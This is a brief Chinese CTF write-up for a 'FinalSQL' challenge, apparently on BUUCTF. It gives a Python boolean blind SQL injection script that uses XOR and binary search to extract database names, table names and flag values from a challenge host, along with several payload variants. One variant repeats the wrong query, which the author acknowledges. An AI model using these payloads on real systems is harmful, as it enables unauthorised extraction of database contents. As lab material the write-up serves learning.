FinalSQL
有id参数,长着就像盲注。
exp:
import requests
if __name__ == "__main__":
string = ""
for i in range(1, 256):
left = 32
right = 127
mid = (left + right) // 2
while left < right:
ch = chr(mid)
sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
url = f'http://a10fc172-5571-460a-9f76-93eb2e9486fd.node3.buuoj.cn/search.php?id={sql}'
# print(url)
response = requests.get(url)
if response.text.find("NO! Not t") == -1:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
string += chr(mid)
print(string)
爆库名
sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
爆表名
sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1" % (i, mid)
爆字段
sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
拿flag
sql = "1^(ord(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),%d,1))>%d)^1" % (i, mid)
然后发现爆错表了2333......
sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)
Last modified 8mo ago